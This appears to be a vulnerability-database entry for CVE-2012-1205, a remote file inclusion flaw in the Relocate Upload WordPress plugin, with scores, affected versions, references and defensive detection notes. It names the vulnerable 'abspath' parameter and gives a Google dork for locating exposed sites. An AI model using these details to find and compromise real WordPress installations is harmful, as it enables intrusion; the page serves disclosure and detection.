CVE-2012-1205
published 2012-02-24CVE-2012-1205: PHP remote file inclusion vulnerability in relocate-upload.php in Relocate Upload plugin before 0.20 for WordPress allows remote attackers to execute arbitrary…
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
24.91%
97.6th percentile
PHP remote file inclusion vulnerability in relocate-upload.php in Relocate Upload plugin before 0.20 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alanft | relocate-upload | <= 0.14 | — |
| alanft | relocate-upload | — | — |
| alanft | relocate-upload | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect GET requests to relocate-upload.php containing both 'ru_folder' and 'abspath' parameters, where 'abspath' contains a URL (remote file inclusion attempt). ↗
- →The vulnerable code passes the 'abspath' GET parameter directly into require_once() after urldecode(), allowing arbitrary remote PHP file inclusion. Monitor for HTTP requests where 'abspath' contains 'http://' or 'https://' schemes. ↗
- →Use the Google dork 'inurl:wp-content/plugins/relocate-upload' to identify exposed vulnerable WordPress installations. ↗
- ·Vulnerability affects Relocate Upload plugin versions before 0.20; version 0.14 was confirmed tested by the researcher. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/79250http://plugins.trac.wordpress.org/changeset/504380/relocate-uploadhttp://secunia.com/advisories/47976http://wordpress.org/extend/plugins/relocate-upload/changelog/http://www.securityfocus.com/bid/49693http://osvdb.org/79250http://plugins.trac.wordpress.org/changeset/504380/relocate-uploadhttp://secunia.com/advisories/47976http://wordpress.org/extend/plugins/relocate-upload/changelog/http://www.securityfocus.com/bid/49693
2012-02-24
Published